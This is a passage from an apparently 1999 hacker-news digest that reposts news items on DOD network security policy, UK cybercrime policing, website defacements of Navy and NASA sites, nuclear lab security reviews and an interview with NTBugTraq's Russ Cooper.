The proposal follows an increase in the rate of cyberattacks -- many stemming
from the Kosovo conflict -- on the Non-Classified Internet Protocol Router
Network (NIPRNET), through which the department transmits unclassified
information, including some tactical data, via the Internet.
Marv Langston, deputy assistant secretary of Defense for command, control,
communications and intelligence (C3I), said top DOD officials have begun
debating whether to disconnect NIPRNET from the Internet and create another
network, a so-called third layer, which would provide Internet links between
DOD and e-commerce partners and provide the public with access to military
Web pages.
The proposed strategy, under debate by DOD officials, would leave the
department with three layers of networks: the Secret Internet Protocol Router
Network, for classified information; NIPRNET, which would become a virtual
private network for internal DOD communications; and the new network,
through which the department would communicate with its business partners
and the public.
John Hamre, deputy secretary of Defense, framed the issues behind the policy
debate in stark terms last week, calling the short air campaign in Yugoslavia
against Serbia "the first cyberwar," citing Serb attacks against NATO's public
World Wide Web pages.
"We were under a cyberattack in our operations against Serbia," Hamre said at
last week's GovTechNet International Conference and Exhibition. DOD is
vulnerable to such attacks because the department "routinely operates in
commercial cyberspace" using NIPRNET, he said.
Lt. Gen. William Campbell, the Army's director for C3I, called the current
NIPRNET policy "close to madness" because it is used to actively support
military operations.
Campbell, who would like to see DOD set up the third-layer network, said the
Pentagon should not compromise the security of NIPRNET to support
e-commerce and interactions with the public. "The [e-commerce] tail should not
wag the C3I dog," Campbell said.
Tim Bass, president and chief executive officer of the security consulting firm
The Silk Road Group Ltd., said the third layer is a very wise plan.
"Denial-of-service attacks against [Internet Protocol] networks are a real threat,
and there is no disagreement that IP is highly vulnerable," Bass said.
"Furthermore, nonclassified IP access to the Internet is now a mission-critical
requirement."
Rick Forno, a security officer for Network Solutions Inc. and a former senior
security analyst at the House of Representatives' Information Resources
Security Office, also said DOD's plan is plausible. "All public-access networks
should be on a completely compartmented environment from anything [classified
"For Official Use Only"] or higher, including day-to-day routine local-area
networks," he said. If properly carried out, the policy "will be a great solution,"
Forno said.
However, the proposed strategy is not without some obstacles, DOD officials
said.
Langston, who also serves as DOD's deputy chief information officer, which
gives him a key role in the network security policy debate, said, "It is difficult to
unplug [DOD] from the Internet."
Establishing a third layer would, in essence, set up another U.S., if not global,
DOD network, which would be expensive, Langston said.
Langston advocates protecting NIPRNET by copying a Navy initiative to
secure networks with an array of technology, including intrusion-detection
systems, firewalls and encryption technology.
The Navy has developed its "defense in-depth" strategy as part of an effort to
build a secure Navywide intranet. Langston believes the strategy obviates the
need to pull the Internet plug except under the most extreme circumstances.
"The only reason to pull off the Internet is a massive cyberattack," Langston
said.
Rear Adm. John Gauss, commander of the Space and Naval Warfare Systems
Command, supports an ongoing NIPRNET redesign, which would involve the
Defense Information Systems Agency upgrading the network's security
measures. "What DISA's doing will protect DOD computing and still give us a
viable means of communicating with industry," Gauss said.
Lt. Gen. William Donahue, director of communications and information for the
Air Force, agreed that disconnecting NIPRNET from the Interent is not a viable
option. "We're not going to disconnect from the Internet because we depend on
it for too much," he said. But, he added, "You have to balance the need to
connect with the need to protect."
Although a decision has not yet been made about the third network, Donahue
envisions DOD reaching a stage where it initially will shut down all connections
between NIPRNET and the Internet, closing all "back door" connections, and
then reconnect DOD with a smaller number of open connections.
"There will probably be a finite number of connections to the Internet, and they
will be protected," Donahue said. When that occurs, DOD still will need "to be
serious, dedicated, dogged and persistent in protecting our network nodes," he
said.
But Campbell will continue to push to cut off DOD from the Internet. "If you
are going to be a pioneer...you cannot be faint of heart."
@HWA
76.0 NCIS Calls For National Computer Crime Squad
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
The UK National Criminal Intelligence Service (NCIS) has
called for the creation of a national cyber force in
England to fight the increasing amount of online crime.
While the Metro police in London do have a computer
crime unit there is no national organization.
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_375000/375156.stm
Sci/Tech
Cyber criminals feel the heat
By Internet Correspondent Chris Nuttall
A national cyberforce of computer specialists is needed
to combat a rising tide of online crime, according to a
major report by the UK National Criminal Intelligence
Service (NCIS).
Project Trawler, a three-year study of Internet crime,
foresees a struggle between criminals and those trying to
prevent illegal activities over the mastery of Net technology
and information.
It says crimes currently being committed include
paedophilia, pornography, hacking, hate sites, fraud and
software piracy. Criminals' use of the Net for secure
communications is an emerging problem.
Interception powers being eroded
The director general of NCIS, John Abbott, told a news
conference:
"I believe that serious
consideration should be given
to the establishment of a
national investigative
computer crime unit to
combat the growing number
of computer crimes being
carried out in the UK and to
identify and target emerging
threats.
"Furthermore, any such unit
should be intelligence-led,
separating out the minor
offenders from those with
both the motivation and capability
to commit serious crimes."
On the day the Home Office released a consultation
paper on the review of the Interception of
Communications Act, the report says existing
capabilities to lawfully intercept communications and
search seized computers will be eroded by the Internet.
"Potentially this would seriously damage law
enforcement's ability to fight serious and organised
crime," it says.
Home Secretary to bolster interception
The Home Secretary, Jack Straw, said he was
determined his proposals would "maintain interception
as the most powerful weapon in the armoury against
crime."
"It often provides the vital intelligence or the crucial piece
of the jigsaw in solving such crimes with on average, one
in two interception warrants resulting in an arrest", he
said.
"But in recent years their capability has come under
threat - sophisticated criminals and terrorists have been
quick to exploit a revolutionised communications
industry and dated legislation on interception."
The proposals, detailed on the Home Office Website,
include creating a single legal framework to regulate
interception of all networks both public and private,
wireless telegraphy and interception of mail.
Encryption expertise needed
Regarding Project Trawler's recommendations, the
Metropolitan Police in London has a computer crime
unit, but there is no such national organisation.
MPs of the Trade and Industry Select Committee said
last month there was a case for such a body in order to
combat criminals using encryption to organise their
illegal activities over the Internet.
NCIS says a national unit would investigate the most
serious offences, develop Internet expertise and support
local forces encountering sophisticated cybercrimes.
Call for international co-operation
Given the global reach of the Net, the report emphasises
that international co-operation is also vital. This includes
combined law enforcement operations, extra-territorial
jurisdiction and consistent extradition of criminals.
It points out that last year's Operation Cathedral had
demonstrated the effectiveness of co-ordinated
international action by law enforcement against
paedophile rings. This involves both exchanging
information at the preliminary stage and preventing
paedophiles tipping off other ring members when arrests
and seizures are made.
The creation of a central library of known paedophilic
images at an international level would both aid the
search for victims and help to determine the nature of
offences, it says.
Cyber complaints on the rise
NCIS suggests that filed complaints of cyber crimes
have risen from 12,000 in 1997 to more than 40,000 in
1998.
But, in an apparent reference to media coverage of the
Internet, it says it does not assess the risks or scale of
criminal activity on the Internet to be as extensive as
sometime portrayed.
The report's author , David Hart, says there is a need for
preventative steps now to avoid having to deal with a
bigger problem later:
"If the rewards are great enough and the risks low
enough then undoubtedly established criminals will
migrate to the new territory of the Internet.
"But, at the moment, even if they had
the motivation, it's not evident that
they have the capability to commit
serious computer crimes. They could
recruit or coerce people who do have
the capabilities but there are associated risks with that."
Future threats
NCIS says the 1990 Computer Misuse Act allows for
penalties of up to five years in jail and unlimited fines.
In future, it says, offences inspired by political motives,
hacking for information with financial value and "work
rage" assaults on systems will feature more.
The approach of the year 2000 is likely to spur some
program writers to create viruses triggered by the
01/01/2000 date.
Project Trawler will be available on the NCIS Website in
an unclassified version. The full report with extensive
statistics will be available to to law enforcement
agencies and government departments.
Report welcomed by cyber rights group
"The conclusions of the report and a multi-layered
approach is welcome for dealing with cybercrimes rather
than heavy-handed government regulation," said Yaman
Akdeniz, director of Cyber-Rights & Cyber-Liberties
(UK), reacting to Project Trawler.
" However, all these initiatives within the layers proposed
should take into account the rights and liberties of
Internet users."
He said the concerns expressed about the ability to
intercept communications revealed law enforcement
bodies were still worried about the use of cryptography
for criminal purposes.
"Overall the publication of the report is welcome and
most of the future problems may be avoided and
prevented by the use and development of better security
tools. Therefore the use and development of encryption
tools should be encouraged rather than controlled for the
prevention of cyber-crimes"
@HWA
77.0 !Hispahack Found Not Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by LeCreme
The trial against !Hispahack member Jfs finished on June
2nd. The Spanish judge considered not guilty the only
!Hispahack member that was accused of breaking into a
university computer. This was the first case of
unauthorized computer intrusion ever judged in Spain.
!Hispahack
http://hispahack.ccc.de/en/index.htm
78.0 asahi.com Defaced
~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by YingYang
One of the major news sites in Japan, Asahi Shimbun
Publishing Co.'s "asahi.com" was defaced in the last few
days. The most interesting thing in this article is the
claim that the news site has suffered several cyber
intrusions in the past but that this was the first one to
cause damage.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/74419
Asahi Shimbun's News Site Suffers Illegal Access
June 22, 1999 (TOKYO) -- Asahi Shimbun Publishing Co.'s news site "asahi.com" was accessed
illegally and could not display the home page in a standard way for a few minutes on June 20.
According to Asahi Shimbun, the problem occurred because an outside person gained illegal
access to one of the company's several mirror servers. Within about 10 minutes,
the mirror server was separated off, and a switch was made to the other servers.
An investigation is focusing on the detailed circumstances and cause of the incident. From
June 20 to the morning of June 21, the company reinforced its surveillance setup. A full-
fledged investigation was set to start June 21, according to the company.
Asahi Shimbun's www.asahi.com has been subjected to illegal access a few times, but the
previous cases ended without causing any substantive damage. This was the first time that
the content was actually written over. As for illegal access to a newspaper company's
news site and rewriting of the top page, another incident occurred recently in Japan. Mainichi
Newspapers Co., Ltd.'s www.mainichi.co.jp, Mainichi INTERACTIVE suffered such a case on
June 12.
(BizTech News Dept.)
@HWA
79.0 NSTAC Releases Reports
~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by lamer
The National Security Telecommunications Advisory
Committee has released several new reports detailing
various aspects of federal computer security and
infrastructure.
NSTAC
http://www.ncs.gov/nstac/NSTACReports.html
@HWA
80.0 FBI This Week
~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
FBI This Week
contributed by ne0h
"FBI, This Week" is the name of the radio program
broadcast to over 3,200 ABC Radio Network affiliates.
This weeks episode is all about International Computer
Crime. If you miss the broadcast on your local station a
real player version is available.
FBI This Week
http://www.fbi.gov/pressrm/radio/fbiweek.htm
@HWA
81.0 Cartoon Hackers?? (From HNN rumours section)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by delchi
WB Scraps 'Real Hackers' Cartoon
Rumor has it that Warner Brothers and Mattel have
scrapped an idea for a new Saturday morning cartoon
with a tie in toy line called "Real Hackers". The defunct
storyline was to portray a group of real life hackers in
cartoon form, reformed and fighting for good. Amongst
the hackers to be represented were 'phiber optik',
'bernie s', 'death veggie', 'emmanuel goldstein' and 'weld
pond' as cyber warriors as they fought criminals bent on
destroying the internet. It is unknown why Warner
Brothers and Mattel scrapped this idea or if it even
existed in the first place but in this hot pre Christmas
marketplace, one can only wonder how long it will be
before this ground breaking idea starts making money
for somebody.
@HWA
82.0 Nuke Labs Stand Down
~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by Dr. Mudge
Yesterday was one of two stand down day at the
national weapons labs (Los Alamos, Sandia, LLNL, etc),
ordered by Energy Secretary Bill Richardson. This means
that due to the pressure and publicity from the
Cox/PFIAB reports no normal work was allowed at the
labs. Only emergency and operational tasks were to be
continued - 16 hours of training courses, web tests,
discussion groups, etc. over a two day period take
everything elses place. The training dealt with review of
existing security efforts, everything from operational to
computer security is being discussed, dissected, and
hopefully digested. While this may be an excellent way
to educate employees one can only hope that network
security monitoring and analysis is considered essential
daily activity.
Albuquerque Journal
http://www.abqjournal.com/news/1secrets06-21.htm
Future of Nuclear Weapons Program
in Dispute
By Jim Abrams
The Associated Press
WASHINGTON -- The head of a presidential panel on nuclear
weapons security, backed by congressional Republicans, says
security problems within the Department of Energy can't be
fixed without creating a new semi-independent agency to
oversee nuclear arms programs But Energy Secretary Bill
Richardson said he is successfully confronting the security lapses
revealed in investigations of suspected Chinese spying at
weapons laboratories, and that no new agency is needed.
"We are ready to have a beefed-up security entity within
the Department of Energy that is stronger," Richardson said on
"Fox News Sunday." "What I don't want is a new agency that is
autonomous that does not report to me."
But former Sen. Warren Rudman, R-N.H., who chaired a
panel of the president's Foreign Intelligence Advisory Board that
issued a highly critical report of the DOE's counterintelligence
efforts last week, said the department has failed to carry out
two key security measures that President Clinton ordered 16
months ago.
It has yet to fully implement polygraph tests for scientists at
the labs and tighter security checks for foreign visitors, Rudman
said on NBC's "Meet the Press." "The attitude of people within
that department, in that bureaucracy, is astounding," he added.
The Washington Post reported today that the federal
government has begun administering polygraphs on the first of
5,000 nuclear weapons scientists and other sensitive employees
at DOE.
It could take four years to complete an initial round of
examinations on the federal workers and private contractors
working with highly classified nuclear secrets, said Edward J.
Curran, head of Energy's counterintelligence office.
So far, only that office's staff has been given the tests, he said.
Richardson told the Post some employees and civil liberties
groups are likely to protest the polygraphs and "I fully expect
lawsuits."
Richardson said there were still problems to resolve but "we
have had dramatic improvements." He said he ordered a
two-day stand-down at all the nuclear labs to test security
measures, and that he plans to dismiss some people responsible
for security lapses in about three weeks.
Richardson last week also named retired Air Force Gen.
Eugene Habiger, the former commander of all U.S. strategic
nuclear forces, to head security operations at DOE.
The president of the University of California, Richard C.
Atkinson, has ordered a review of security at the three nuclear
laboratories managed by the university to make sure national
security is not being compromised.
The FBI has investigated allegations that a former employee
of Los Alamos National Laboratory was a spy for China. The
university also manages Lawrence Livermore National
Laboratory and Lawrence Berkeley National Laboratory.
Atkinson has asked his Council on National Laboratories to
examine whether newly tightened measures are being
implemented and whether additional measures are needed. He
also wants to compare the university's security to the protocol
used by Lockheed Martin, which manages Sandia National
Laboratories in Albuquerque.
Rudman, meanwhile, is expected to receive a good reception
Tuesday when he testifies to Congress on his panel's
recommendation that the weapons program become
semi-autonomous, reporting only to the energy secretary.
"I agree with the Rudman report," said Sen. Richard Shelby,
R-Ala., chairman of the Senate Intelligence Committee. "We've
said all along that the labs are not safe today. They're not safe
tomorrow."
Richardson, he said, is trying to "seal the leaks at the labs.
He's trying to bring accountability to the labs. But I believe it's
going to take statutory change to do it. I don't believe ultimately
he can do it just by himself."
Shelby said Republican Sens. Frank Murkowski of Alaska, Jon
Kyl of Arizona and Pete Domenici of New Mexico would try to
attach language on such a separation of powers to an
intelligence spending bill coming before the Senate soon.
@HWA
83.0 X-Force Down Under is Hiring
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by solvant
Need a job? Live in Australia? X-Force, part of ISS, is
recruiting Australian security experts for their three
month old Australian office. We sure hope they do
thorough background checks, wouldn't want them hiring
any evil hackers by mistake. A quote from the article by
Cris Rouland of ISS "I don't go out and recruit hackers
per se; I look for very strong software engineers with a
deep understanding of security and strong knowledge of
the computer underground." If that isn't a hacker I don't
know what is.
Fairfax IT
http://www.it.fairfax.com.au/software/19990621/A56795-1999Jun21.html
Australians hack into the X-Force
By DAVID BRAUE AN international anti-hacker organisation,
X-Force, is recruiting Australian security experts for an
Australian brigade.
X-Force is operated by the security software company
Internet Security Systems (ISS), which opened its
Australian office three months ago.
X-Force director Chris Rouland, in Brisbane last week
to speak at a conference on computer security incident
handling and response, said recruits for X-Force were
"very difficult to find".
"I don't go out and recruit hackers per se; I look for very
strong software engineers with a deep understanding
of security and strong knowledge of the computer
underground."
The Australian X-Force will join counterparts in London
and Atlanta in keeping tabs on the underground
community of hackers who attack government and
corporate computer networks.
Australian recruits will work while their overseas
counterparts sleep, allowing a 24-hour security
research organisation with global response capabilities.
The 50-strong X-Force continually folds, spindles and
mutilates commercial software to identify weaknesses
that might be taken advantage of by hackers.
Among its accomplishments was being the first to
decipher the insidious Back Orifice trojan horse virus
and produce a fix for the problem. "That was a good
exercise for us, a chance to stretch our legs," laughs
Rouland, about the application considered to be one of
the most dangerous hacker attacks of the decade.
Reports suggest the team's efforts are paying off: the
analyst firm Yankee Group recently reported ISS as
having 30 per cent of the $US315 million ($485 million)
adaptive security market, while the No 2 firm, Axent
Technologies, had 19 per cent.
Many of the team's innovations - including
proof-of-concept projects that are developed by a
special team known as Protoworx - end up as additions
to ISS's commercial suite of intrusion detection
software.
Recent X-Force work has produced the likes of the
Attack Tracker (which allows intrusion detection
systems to trace and identify incoming intruders);
Casper (a Linux server that offers itself as a tempting
target for hackers while collecting data on their break-in
attempts); and the new Total Surveillance Architecture.
@HWA
84.0 More Canadian RedBoxing from HackCanada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by RenderMan
Need a RedBox in Canada? Got a Diamond Rio for your
MP3s? One more reason for the authorities to hate MP3s
and the device. HackCanada has released a text file on
how to use your Diamond RIO as a RedBox.
HackCanada
http://www.hackcanada.com/canadian/phreaking/riobox.txt
85.0 SecureMac is Now Open
~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by MacUser
SecureMac.com has opened their doors this week to a
new site devoted to Macintosh Security. Learn more
about the security that exists for the mac, and how to
make your system more secure. Learn just how weak or
strong the security is on certain products as well. This
site covers encryption, security, virus, and much more.
This site is run by the same person who runs Freaks
Macintosh Archives a site devoted to macintosh hacking
and security.
SecureMac.com
http://www.securemac.com
Freaks Macintosh Archive
http://freaky.staticusers.net
@HWA
86.0 Microsoft Demands Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by Sangfroid
Following in IBMs footsteps Microsoft will now demand a
privacy statement be present on all web sites that it
buys advertising from. Why have the two largest
internet advertisers taken this stance? The FTC is about
to make its recommendations to congress about
whether tough new federal privacy laws should be
enacted. Of course this means that HNN will have to
post something about how you have no privacy and
that we log everything, but then so does every other
web site. It should be a fun page to write. Look for it in
the next few days.
Nando Times
http://www.techserver.com/story/body/0,1634,62850-99839-710835-0,00.html
Microsoft to require privacy statement before advertising on Web sites
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
By TED BRIDIS
WASHINGTON (June 22, 1999 11:21 p.m. EDT http://www.nandotimes.com) - Microsoft Corp., the largest advertiser on the Internet, has
decided it will not buy ads next year on Web sites that fail to publish adequate privacy promises to consumers. The announcement
comes less than three months after a similar decision by IBM, the Web's second-largest advertiser.
The actions by the two companies come as the Federal Trade Commission prepares its recommendations to Congress on whether tough new federal
privacy laws are needed to protect consumers online.
The Microsoft announcement to be made Wednesday was expected at a computer conference in New York and will take effect after the end of the year.
Microsoft said it spent about $30 million last year on Web ads - but that's still a small portion of the $2 billion spent last year on Web advertising,
according to the Internet Advertising Bureau.
Microsoft, which has lobbied with other industry groups against privacy laws legislation, earlier this year began offering a free digital tool kit that promises
to allow consumers to use next-generation software to restrict what personal details Web sites collect about them.
Consumers typically must manually find a company's online privacy statement, if one exists, and read through legalese to determine what personal
information a Web site might be harvesting, such as their name, e-mail address or even favorite authors or clothing sizes.
Last month, an industry-financed study showed businesses have made dramatic improvements since last year in warning people how companies use
personal information collected about them.
Nearly two-thirds of commercial Internet sites displayed at least some warning that businesses were collecting personal details from visitors, such as
names, postal and e-mail addresses, and even shopping tastes, the study found. But less than 10 percent of those sites had what experts consider
comprehensive privacy policies.
A similar study last summer by the FTC found only 14 percent of sites warned how companies used private information they collected about customers.
@HWA
87.0 Pentium III has 46 Bugs
~~~~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by Kanuchsa
The Pentium III bug list has been posted by Intel in PDF
format, lists 46 bugs or "erratums" as Intel likes to call
them, not much ahead for fixes for them hardware wise
mainly because Intel is calling them minor. One of them
is a FPU error which appears to have no plans to be
fixed in the future.
The UK Register
http://www.theregister.co.uk/990617-000007.html
PDF Doc listing 'erratums' not bugs
ftp://download.Intel.nl/design/pentiumiii/specupdt/24445304.pdf
88.0 'War' Against FBI Continues
~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by dis-crete
F0rpaxe has struck again and this time defaced the web
site of the Naval Training Systems Center with some
serious rhetoric leveled against the FBI. DigiAlmighty
defaced the Naval Surface Warfare Center which is
slightly ironic as the Dahlgren division of NSWC helped
develop the Co-operative Intrusion Detection Evaluation
and Response program commonly referred to as the
'hacker tracker'. Additionally the web site for NASA's
Earth Observing System Data and Information System
has been defaced by the Keebler Elves. HNN has mirrors
of all three sites available. (Mirrors provided by
attrition.)
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0621/web-navyhack-6-23-99.html
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
JUNE 23, 1999 . . . 7:52 EDT
Hacker groups target Navy sites
BY BOB BREWIN (antenna@fcw.com)
AND DIANE FRANK (diane_frank@fcw.com)
In the wake of attacks on the FBI World Wide Web
sites earlier this month, hacker groups have now
turned their attention to the Navy, including the Web
site of a Navy organization that helped develop
sophisticated hacker-tracker software.
Last week a hacker defaced the Web site
(www.nswc.navy.mil) of the Naval Surface Warfare
Center's Dahlgren, Va. division with a mostly obscene
message that read in part, "FEDS: You will never stop
my FLOW. Nice try, though. Killing my hotmail
account and all that. HAHHAHA." The Dahlgren
division of NSWC helped develop the Co-operative
Intrusion Detection Evaluation and Response program
(www.nswc.navy.mil/ISSEC/CID/), which uses
automated tools to track and analyze hacker attacks.
Another hacker -- who, based on the postings on the defaced Navy Web sites,
may be engaged in hacker duel with the Dahlgren attacker -- hit the Web site of
the Naval Air Warfare Center Training Systems Division (www.ntsc.navy.mil),
Orlando, Fla.
This hacker, who affiliated himself with the group f0rpaxe, said on the defaced
Navy page, "We own the Naval Air Warfare Center Systems Training Division.
FBI spokesman said we were only doing some gov and mil servers [but] we
rooted Naval Air Warfare Training Center....We had been exploring entire
servers until today."
Navy spokesmen have not returned calls from FCW asking for comment on the
Web attacks.
89.0 Singapore Officials Arrest Two
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by Dioxin
Two individuals have been arrested for violations of the
Computer Misuse Act for their involvement in the recent
web defacements of www.tcs.gov.sg and
www.mediacity.com.sg (Television Corporation of
Singapore). Apparently, they had forgotten to spoof
their addresses before they committed the dirty act.
They face a maximum of a S$10,000 fine and up to
three years in jail. Speculation is that they used the
new malformed .htr request bug in IIS to gain entry to
the servers.
The Straits Times
http://straitstimes.asia1.com.sg/cyb/cyb1_0624.html
(Link not found June 25th - Ed)
90.0 GSA Looking for IDS
~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by erewhon
The General Services Administration is looking for
vendors to set up and manage intrusion detection
systems for civilian agency networks to monitor for
cyber intrusions. The GSA plan calls for information
gathered by the system to be sent to a central facility
in Washington DC for analysis.
Federal Computer Week
http://fcw.com/pubs/fcw/1999/0621/web-gsa-6-23-99.html
JUNE 23, 1999 . . . 11:10 EDT
GSA seeks tools, services to monitor government
nets
BY DIANE FRANK (diane_frank@fcw.com)
The General Services Administration is seeking vendors qualified to set up and
manage hardware and software to monitor civilian agency networks for security
breaches, the agency announced today.
The project, being managed by the GSA Federal Technology Service's Office of
Information Security, aims to build a full intrusion-detection system that will
enable agencies to identify and collect information on external attacks on federal
information technology resources, according to a notice published in Commerce
Business Daily. The program initially will focus on identifying external attacks
on agency systems.
Under GSA's plan, information collected by the system will be transmitted
almost immediately to a central analysis facility in the Washington, D.C., area.
@HWA
91.0 Theres Money in them thar videos! (DEFCON WEBCAST)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
DefCon Live WebCast
contributed by Shanners
Unable to make it to Las Vegas this year? HNC Network,
an HNN Affiliate, will be conducting a live webcast from
the show floor. They will cover Hacker Jeopardy, Hacker
Death Match, as well as numerous live interviews with
speakers and attendees, and some recorded material.
There will also be prizes given away through the
webcast like Free/OpenBSD, RH 5.2 and Hackers Secrets
5. They are charging $29.95 for the three day
broadcast.
Live Defcon Webcast
http://www.hack-net.com/defcon
(I dunno, you make your own decisions on this one ... - Ed)
92.0 Kasparov Defaced?
~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by macwizard
Well, something has been going on with the World vs.
Kasparov Chess Match. Microsoft says it was technical
difficulties due to server overload. We have a received a
few emails saying that the site was indeed broken into.
It is claimed that the password to the site was sniffed
and that is how entry was gained. Unfortunately we are
unable to confirm neither the MS position or the emails.
BBC
http://news2.thdo.bbc.co.uk/hi/english/sci/tech/newsid%5F376000/376147.stm
Sci/Tech
Kasparov's chess pieces
disappear
Kasparov will have 24 hours per move
As the world's chess fans gathered on the Internet to pit
their wits against champion Garry Kasparov, unorthodox
rooks, knights, bishops and queens began appearing
and disappearing on the board.
Billed as the greatest Internet chess challenge ever, the chance
to log on and compete against the world's greatest player attracted
over two million hits in the first few hours.
But the Microsoft Gaming Zone Web
site hosting the tournament was not up to the challenge.
As Bob Sullivan, technology reporter with MSNBC News
watched, things began to go wrong, before a single move
had been played.
"Chess pieces were landing all over the board," Mr
Sullivan reported.
According to MSNBC, the problems were due to server
overload - a technical hitch rather than a hacker spoiling
the site on purpose.
"It is certainly an embarrassment for the company," said
Mr Sullivan.
First move
After Mr Kasparov's opening move (Pawn to E-4) in New
York on Monday, he travelled to Washington, DC, where
users guided by four young chess experts initiated the
"Sicilian Defence", moving pawn to C-5.
The World Team's first move was chosen by 41% of
those voting.
Kasparov declined to make another move in order to
maintain the "suspense," said Audrey Waters, the
chess champion's spokeswoman. He has 24 hours to
respond.
Deep Blue challenge
Mr Kasparov is widely regarded as the greatest chess
player ever. He has been particularly strong over the last
few months with three convincing tournament victories in
a row.
In 1996 and 1997, he played two six-game matches against the Deep
Blue computer, winning the first and losing the second.
Millions of Net users are believed to have followed those games.
It was the first time a computer had defeated a reigning
world champion in a match played under classical chess
rules. The chances of the world beating Mr Kasparov
seem lower.
@HWA
93.0 Russ Cooper Interview
~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by Space Rogue
MSNBC has an excellent interview with Russ Cooper, the
NTBugTraq administrator. If you subscribe to
NTBugTraq, or even if you don't, you should read this.
MSNBC
http://www.msnbc.com/news/283054.asp
Surgeon general
of the Web?
NTBugTraq’s Russ Cooper
serves as independent authority
on bugs, viruses,
security issues
By Bob Sullivan
MSNBC
June 23 — The eruption of a new computer virus
often leads to massive confusion. Besieged system
administrators and confused users need hard
information about what the danger is and what to
do, but it’s elusive. Adding to the confusion,
anti-virus software companies issue
superlative-laden press releases, perhaps
exaggerating the real threat. Meanwhile, software
vendors like Microsoft often downplay the threats
to prevent bad PR. In the middle of this maelstrom
is Russ Cooper.
WHO’S RUSS COOPER? He’s the owner and
administrator of perhaps the most popular security mailing list
on the Internet, NTBugTraq — a sort of emergency
broadcast system for computer network administrators.
When any security hole is found, it’s posted to this list,
sometimes even before Microsoft or anti-virus companies
know about it. (Microsoft is a partner in MSNBC.)
In fact, it’s a pelt of honor to be the first to send Cooper
a bug, and posters do so sometimes to attract the attention of
future employers.
As the human filter for NTBugTraq’s 25,000 very
devoted members, Cooper serves as a kind of referee for
groups arguing about the authenticity and severity of
computer crises, but he has his sights set on a loftier goal. He
views himself as the surgeon general of the Internet. He
grand plans include launching an Internet security “portal”
Web site called Securityadvice.com in the fall.
WITHOUT THE MARKETING SPIN
“I just want to try and be a consistent voice to the
masses for these types of issues,” Cooper said.
“Trying to give the facts in a way people can understand
that doesn’t overemphasize the threat. ... I don’t try and
downplay things, but I’m not trying to get a stock increase out
of [announcements]. I want people to be informed of the
facts without the marketing spin.”
His bare-bones, straightforward style came through on
April 23, just before the Windows CIH/Chernobyl virus hit.
While anti-virus companies and media outlets were warning
of potential data devastation that never materialized in the
United States, Cooper sent this note to his list: “The CIH
virus might cause problems on Monday, April 26th, for some
of you. Do a virus scan before 4/26/99. Check with your
anti-virus vendor is you don’t know what it is, or see;
http://www.antivirus.com/vinfo/alerts.htm for more info. ‘nuff
said here.”
Securityadvice will be a commercial site, and Cooper
says his bankers have raised $2 million. But for now, he
administers NTBugTraq and its companion Web site out of
the goodness of his heart (the Web site does take in about
$7,000 to $8,000 in advertising a month, enough to pay for a
secretary and cover expenses).
COOPER’S GIRLFRIEND
Cooper’s heart shone through six weeks ago when the
39-year-old divorced man decided he was tired of living alone
and took out a half-page personal ad in the local Lindsay,
Ontario, newspaper, headlined, “Meg Ryan, where are you?”
“I own my own business working on the Internet,
became internationally recognized in my field, and moved to
Lindsay to enjoy an idealistic lifestyle of working from
home,” he wrote in the ad.
Days later, a bus driver who read the ad set him up, and
he has spent his weekends with Kathy ever since.
But his weekdays, and weeknights, are devoted to the
list. Cooper now spends 12 to 14 hours Monday through
Friday in front of a computer screen. That includes the
computer screen that hovers over his bed, hospital tray style.
A COMPUTER IN HIS BOAT?
“I can sit in bed and type and read away. I can do a
quick check when I get up in the morning. ... I haven’t
figured out how to get one in my boat yet,” Cooper joked. “In
this role I have to be real responsive timewise.”
Included in this labor of love are hours of free consulting
Cooper offers to the 25,000 list members who send notes
with possible “exploits.” He edits every note that comes in,
removing redundant e-mails, posting only verifiable
information. As often as not, a flaw sent to the list is caused
by human error, not a computer bug, and Cooper offer free
help desk-like advice to fix the problem. That keeps traffic on
the list down to a trickle of about 10 messages or so per day
— but all of them laser-focused.
“People have told me in the past that they read every
message I send and are prepared to react to every message I
send,” Cooper said.
THE IMPRESSIVE AUDIENCE
Among those ready to react to every Cooper message:
Jason Garms, the lead product manager for Windows NT
security at Microsoft, who’s a list member. Even though
Cooper’s list is devoted to publicly flogging (some might say
embarrassing) Microsoft by revealing flaws in Windows NT,
Garms says he has a good, personal working relationship with
Cooper. They correspond by e-mail as often as once a week.
“We don’t always see eye to eye with Russ,” said
Garms, who has worked with Cooper since NTBugTraq
